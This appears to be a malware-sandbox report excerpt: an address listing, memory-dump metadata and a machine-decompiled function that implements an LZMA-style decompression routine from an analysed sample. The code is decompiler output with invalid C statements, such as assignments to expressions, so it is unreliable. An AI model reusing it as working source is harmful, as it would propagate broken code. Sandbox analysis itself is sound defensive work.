0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406dcf
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
